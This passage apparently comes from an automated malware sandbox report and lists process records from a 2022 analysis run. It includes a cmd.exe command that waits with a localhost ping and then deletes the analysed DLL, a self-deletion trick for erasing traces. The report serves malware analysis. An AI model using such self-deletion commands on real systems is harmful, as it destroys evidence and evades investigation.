                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:19
                      Start time:16:28:52
                      Start date:04/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff74fc70000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:21
                      Start time:16:29:09
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Imagebase:0x7ff602050000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:22
                      Start time:16:29:10
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff77f440000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:23
                      Start time:16:29:10
                      Start date:04/05/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff6dcd20000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:24
                      Start time:16:29:23
                      Start date:04/05/2022
                      Path:C:\Windows\System32\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                      Imagebase:0x7ff7b5d10000
                      File size:99272 bytes
                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Disassembly

                      No disassembly